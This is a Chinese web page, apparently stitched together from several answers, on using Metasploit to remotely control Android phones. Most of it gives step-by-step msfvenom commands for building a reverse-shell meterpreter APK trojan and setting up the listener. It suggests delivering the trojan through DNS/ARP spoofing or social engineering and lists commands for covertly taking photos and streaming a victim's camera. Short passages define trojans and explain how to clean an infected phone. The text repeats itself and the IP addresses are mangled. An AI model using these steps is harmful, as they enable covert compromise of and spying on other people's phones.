既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP
本机IP:19216816
在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=19216817 LPORT=5555 R > /root/apkapk
以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示
msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径
这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具
输入命令:msfconsole
然后输入:
1 use exploit/multi/handler 加载模块
2 set payload android/meterpreter/reverse_tcp 选择Payload
3show options 查看参数设置
我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1set LHOST 19216816 这里的地址设置成我们刚才生成木马的IP地址
2set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口
3exploit 开始执行漏洞 开始监听
OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件
还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试
安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了
我们可以在我们的MSF里看见有一个会话连接了
这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo
webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头
webcam_snap 隐秘拍照功能
后边跟上参数-i 指定使用那个摄像头拍照
可以看见我们分别对前后摄像头都拍了照 保存到了桌面上
还可以输入命令 webcam_stream 开启摄像头
简单的回答:
木马是编写的一种远程控制恶意程序,木马会未经用户许可,记录用户的键盘录入,**用户银行账户,密码等信息,并将其发送给攻击者。
复杂一点的:
木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。
传染方式:通过电子邮件附件发出,捆绑在其他的程序中。
病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法 *** 作。
怎么做?
不告诉你了。---其实是我也不会!
先查看kali的ip,我的是1114
然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apkapk
5555是设置的端口,可以自己更改 显示这个说明已经生成成功了。
下载软件请到正规软件官网下载,也可以到各大应用商店中下载软件,请勿到陌生网址进行下载。若手机中存在木马或者病毒程序,请尝试按照以下步骤进行清除:
安装一款安全软件(例如:手机管家等)。以手机管家为例,打开手机管家,点击主界面上的一键体检即可自动检测手机中存在的病毒,点击一键清除即可删除。
若是无法开机或无法进行解决请尝试到手机品牌官网下载刷机包和工具对手机进行完整恢复,若无法自行处理请送到手机品牌官方售后进行维修。
先查看kali的ip,我的是1114
然后输入命令:msfvenom
-p
android/meterpreter/reverse_tcp
LHOST=你kali的ip
LPORT=5555
R
>
/root/apkapk
5555是设置的端口,可以自己更改
显示这个说明已经生成成功了。
以上就是关于msf怎么远程监控安卓手机全部的内容,包括:msf怎么远程监控安卓手机、什么是木马怎样做、kali生成安卓木马是不是只能用一次等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)